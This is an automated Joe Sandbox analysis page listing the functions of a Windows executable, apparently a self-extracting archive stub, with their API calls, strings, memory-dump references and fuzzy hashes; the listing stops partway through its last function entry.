IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 007F8767
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 007F8771
UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 007F877E

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: a1490598ca9bd5d016692bdd55a104cc3e87730bef86a570e03a20a85b5f1259
Instruction ID: 495901196befa75b25181bb2272864d10f583ffa41243881225a98bd8ff2824d
Opcode Fuzzy Hash: a1490598ca9bd5d016692bdd55a104cc3e87730bef86a570e03a20a85b5f1259
Instruction Fuzzy Hash: 5731D27590122CABCB61DF65D888B9DBBB8BF08310F5041EAF90CA7251EB349F858F45

Function 007EA63C Relevance: 3.0, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 007EA662
GetNumberFormatW.KERNEL32(00000400,00000000,?,0080E600,?,?), ref: 007EA6B1

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 5f2f73471ee5d881c6e79a6dc6586f12919ae0c6827ffcc55844e0dec6936d78
Instruction ID: be095410e4b9cdbb818f14a3182fa90d34c0e58ef4ac43aa44582acc3806ef89
Opcode Fuzzy Hash: 5f2f73471ee5d881c6e79a6dc6586f12919ae0c6827ffcc55844e0dec6936d78
Instruction Fuzzy Hash: 80014C36210208BEDB608FA4EC09F9B77BCFF19710F004822BA1497250D3719A55C7A9

Function 007D6EC9 Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(007E117C,?,00000200), ref: 007D6EC9
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 007D6EEA

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 43b2c760f01655e85bd3264cea07d21d31297b7ed4bb03283bdfb5be28723dd1
Instruction ID: db8549f9721fb783618aada5c7b36dfd6b29fe30abb72de8e5ec27d9b05e249c
Opcode Fuzzy Hash: 43b2c760f01655e85bd3264cea07d21d31297b7ed4bb03283bdfb5be28723dd1
Instruction Fuzzy Hash: 11D0C9353C8302BFEA510A75CC06F2B7BA8B755B82F20C515B356E90E0CA7090149629

Function 007DACF5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 007DAD1A

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 7535536bd06c8b32f6528c5be77d4c385b6cf78e57766574fa229a12b64c5893
Instruction ID: 992c4fb6e1a9ff1fb37f9a00254d112f7bd216419e04ee432d7cfddf364015d9
Opcode Fuzzy Hash: 7535536bd06c8b32f6528c5be77d4c385b6cf78e57766574fa229a12b64c5893
Instruction Fuzzy Hash: 8EF05B70E0060C8FCB24CF18EC425D573B6FB59711F10469AD91543798D7B46D81CF51

Function 007EF063 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,007EEAC5), ref: 007EF068

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: ea0b88c9d9222711944c3a86269fbf3ac4ba1759c6505ea2f08c658dc034a381
Instruction ID: 6344f90d8a7330e354d2d681c126147c253565e7fe081e7d8ac59cc40e59ceb4
Opcode Fuzzy Hash: ea0b88c9d9222711944c3a86269fbf3ac4ba1759c6505ea2f08c658dc034a381
Instruction Fuzzy Hash:

Function 007FB710 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 007FB710

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 54d0be813de643df426297e25ccc71128f639a8a57f1b10f89d22900c50bc23c
Instruction ID: 5ea46d2d7847806337a30605b8bd5fe641c738de8c534cb25e4cba0c09e81c87
Opcode Fuzzy Hash: 54d0be813de643df426297e25ccc71128f639a8a57f1b10f89d22900c50bc23c
Instruction Fuzzy Hash: 57A001B46022018BDB808FB6AA0E2093AADBA99A91709866AA509C6160EA2485609F11

Function 007DDA98 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 236COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 007DDABE

Part of subcall function 007D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007D401D

Part of subcall function 007E1596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00810EE8,00000200,007DD202,00000000,?,00000050,00810EE8), ref: 007E15B3

_strlen.LIBCMT ref: 007DDADF
SetDlgItemTextW.USER32(?,0080E154,?), ref: 007DDB3F
GetWindowRect.USER32(?,?), ref: 007DDB79
GetClientRect.USER32(?,?), ref: 007DDB85
GetWindowLongW.USER32(?,000000F0), ref: 007DDC25
GetWindowRect.USER32(?,?), ref: 007DDC52
SetWindowTextW.USER32(?,?), ref: 007DDC95
GetSystemMetrics.USER32(00000008), ref: 007DDC9D
GetWindow.USER32(?,00000005), ref: 007DDCA8
GetWindowRect.USER32(00000000,?), ref: 007DDCD5
GetWindow.USER32(00000000,00000002), ref: 007DDD47

Strings

d, xrefs: 007DDBA5
$%s:, xrefs: 007DDAB2
CAPTION, xrefs: 007DDC77

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: b55c0e5d04fd55aa160a70d80f57dc7539e7084a80783a4de969b8025828b568
Instruction ID: 1751fb9c79fa884e8555d06ff92a846a22bef799c08e2489b21e8d20d8da6b2c
Opcode Fuzzy Hash: b55c0e5d04fd55aa160a70d80f57dc7539e7084a80783a4de969b8025828b568
Instruction Fuzzy Hash: 02816D71208305AFD720DF68CD89A6FBBF9FBC9704F04091EFA8493291D674E9098B52

Function 007FC233 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 007FC277

Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBE2F
Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBE41
Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBE53
Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBE65
Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBE77
Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBE89
Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBE9B
Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBEAD
Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBEBF
Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBED1
Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBEE3
Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBEF5
Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBF07

_free.LIBCMT ref: 007FC26C

Part of subcall function 007F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?), ref: 007F84F4
Part of subcall function 007F84DE: GetLastError.KERNEL32(?,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?,?), ref: 007F8506

_free.LIBCMT ref: 007FC28E
_free.LIBCMT ref: 007FC2A3
_free.LIBCMT ref: 007FC2AE
_free.LIBCMT ref: 007FC2D0
_free.LIBCMT ref: 007FC2E3
_free.LIBCMT ref: 007FC2F1
_free.LIBCMT ref: 007FC2FC
_free.LIBCMT ref: 007FC334
_free.LIBCMT ref: 007FC33B
_free.LIBCMT ref: 007FC358
_free.LIBCMT ref: 007FC370

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 0753791832cd7a6bb7d4544b4ec52df9c13feb636abca3a11aa25f6e01d50aca
Instruction ID: ee12a100e99c2a2827d7ee34f8d27bbf4ce11bb9449d0528ebae135a96891120
Opcode Fuzzy Hash: 0753791832cd7a6bb7d4544b4ec52df9c13feb636abca3a11aa25f6e01d50aca
Instruction Fuzzy Hash: 30315E3250420DDFEB62AF78DA49B7673E9FF00350F148429E649D7751DF39AC409A52

Function 007ECD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 007ECD51
GetClassNameW.USER32(00000000,?,00000800), ref: 007ECD7D

Part of subcall function 007E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,007DBB05,00000000,.exe,?,?,00000800,?,?,007E85DF,?), ref: 007E17C2

GetWindowLongW.USER32(00000000,000000F0), ref: 007ECD99
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 007ECDB0
GetObjectW.GDI32(00000000,00000018,?), ref: 007ECDC4
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 007ECDED
DeleteObject.GDI32(00000000), ref: 007ECDF4
GetWindow.USER32(00000000,00000002), ref: 007ECDFD

Strings

STATIC, xrefs: 007ECD83

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: 7c1aa05bcbe15d413a9ad60b3b79bc55a558dadbbd96db08a7d6fc9201b56d07
Instruction ID: b7cd4d254d155403f071642d010337477f12474269508897cc4261bba18d2761
Opcode Fuzzy Hash: 7c1aa05bcbe15d413a9ad60b3b79bc55a558dadbbd96db08a7d6fc9201b56d07
Instruction Fuzzy Hash: 7C11EB366427A1BBE721AB619C0DF9F365CFB99741F004820FB41A1092CA688D1686A4

Function 007F8EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 007F8EC5

Part of subcall function 007F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?), ref: 007F84F4
Part of subcall function 007F84DE: GetLastError.KERNEL32(?,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?,?), ref: 007F8506

_free.LIBCMT ref: 007F8ED1
_free.LIBCMT ref: 007F8EDC
_free.LIBCMT ref: 007F8EE7
_free.LIBCMT ref: 007F8EF2
_free.LIBCMT ref: 007F8EFD
_free.LIBCMT ref: 007F8F08
_free.LIBCMT ref: 007F8F13
_free.LIBCMT ref: 007F8F1E
_free.LIBCMT ref: 007F8F2C

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4070c2fc609d9f27f2178a0e08eb6278a2fef173606ec28cf73a1d76ec3c8dbc
Instruction ID: 69d5b7e09d585c98669ea95af88eab9b5fa7690dc34f7db99d9f94422f4eabac
Opcode Fuzzy Hash: 4070c2fc609d9f27f2178a0e08eb6278a2fef173606ec28cf73a1d76ec3c8dbc
Instruction Fuzzy Hash: 5711D27610014DEFCB91EF94C846DFA3BA5FF08350B0180A0BA088B626DA35EA51DB82

Function 007D2162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON

Download Yara Rule

Strings

x%u, xrefs: 007D267A
xc%u, xrefs: 007D26D7
;%u, xrefs: 007D2497

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID:
String ID: ;%u$x%u$xc%u
API String ID: 0-2277559157
Opcode ID: aa5030391c03d87d99377164ff8259c4bcbc3c5259476bd977c7074c80d62488
Instruction ID: c0b557894a908425af4c64166102bcd0cb65d276c6c62e86d70efbd74e485fd4
Opcode Fuzzy Hash: aa5030391c03d87d99377164ff8259c4bcbc3c5259476bd977c7074c80d62488
Instruction Fuzzy Hash: F5F12A716043419BDB25DF348899BEE77B96FA0310F08456BF9858B383DA6CD847C7A2

Function 007EACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D130B: GetDlgItem.USER32(00000000,00003021), ref: 007D134F
Part of subcall function 007D130B: SetWindowTextW.USER32(00000000,008035B4), ref: 007D1365

EndDialog.USER32(?,00000001), ref: 007EAD20
SendMessageW.USER32(?,00000080,00000001,?), ref: 007EAD47
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 007EAD60
SetWindowTextW.USER32(?,?), ref: 007EAD71
GetDlgItem.USER32(?,00000065), ref: 007EAD7A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 007EAD8E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 007EADA4

Strings

LICENSEDLG, xrefs: 007EACE4

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 7b36987efdd560a0fcd692a1f4d30bf95cbe903b3d1c7fd091326adbaafb517d
Instruction ID: 3c4ee947a8734cbf16e5072eec46ea793efd6b52bc16d8c7a280b82ffb0a0eb4
Opcode Fuzzy Hash: 7b36987efdd560a0fcd692a1f4d30bf95cbe903b3d1c7fd091326adbaafb517d
Instruction Fuzzy Hash: 69210532341254FBE2259F72ED4DE7B3B6CFB8EB56F004414F604E25A0CB6AA901D632

Function 007D9443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007D9448
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 007D946B
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 007D948A

Part of subcall function 007E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,007DBB05,00000000,.exe,?,?,00000800,?,?,007E85DF,?), ref: 007E17C2

_swprintf.LIBCMT ref: 007D9526

Part of subcall function 007D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007D401D

MoveFileW.KERNEL32(?,?), ref: 007D9595
MoveFileW.KERNEL32(?,?), ref: 007D95D5

Strings

rtmp%d, xrefs: 007D950F

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
String ID: rtmp%d
API String ID: 2111052971-3303766350
Opcode ID: 709fcb0d32dc246bf2e49c6a3497e66773a83b97c4022f49c3b85c758e727940
Instruction ID: 9db698906d0a3fb76e1adb2a5922c1225a513ba28202a41040a1d22535e7b7f6
Opcode Fuzzy Hash: 709fcb0d32dc246bf2e49c6a3497e66773a83b97c4022f49c3b85c758e727940
Instruction Fuzzy Hash: 25412171901159F6CF60EB61CC89ADE737CAF15780F0444E6B649E3242EB789B89CB64

Function 007E8E62 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 125memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 007E8F38
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 007E8F59
CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 007E8F80

Strings

utf-8"></head>, xrefs: 007E8EBD
<html>, xrefs: 007E8EA7, 007E8EE0
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 007E8EB2
</html>, xrefs: 007E8F0A

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: Global$AllocByteCharCreateMultiStreamWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 4094277203-4209811716
Opcode ID: e8a3f964eb265bf52622c0073efff4f186c5149231db063959c835ec359803c8
Instruction ID: 6b2988034e050466898999469ef290da041d2276c1fcf0f155c785a8a753931b
Opcode Fuzzy Hash: e8a3f964eb265bf52622c0073efff4f186c5149231db063959c835ec359803c8
Instruction Fuzzy Hash: 14316A31149345ABD724BB359C0AFAF7758EF89720F040109FA15A62C1EF6C9A08C3A2

Function 007E0A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 007E0A9D

Part of subcall function 007DACF5: GetVersionExW.KERNEL32(?), ref: 007DAD1A

FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 007E0AC0
FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 007E0AD2
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 007E0AE3
SystemTimeToFileTime.KERNEL32(?,?), ref: 007E0AF3
SystemTimeToFileTime.KERNEL32(?,?), ref: 007E0B03
FileTimeToSystemTime.KERNEL32(?,?), ref: 007E0B3D
__aullrem.LIBCMT ref: 007E0BCB

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 4c35439f09564c0ddbdc7f3b87a1428cbba69f7777353f123f301096b12a9eba
Instruction ID: 08dab8fe2ea49d074da747fcd4d6165bea41068a2945a6e8373810f1fcb31dc2
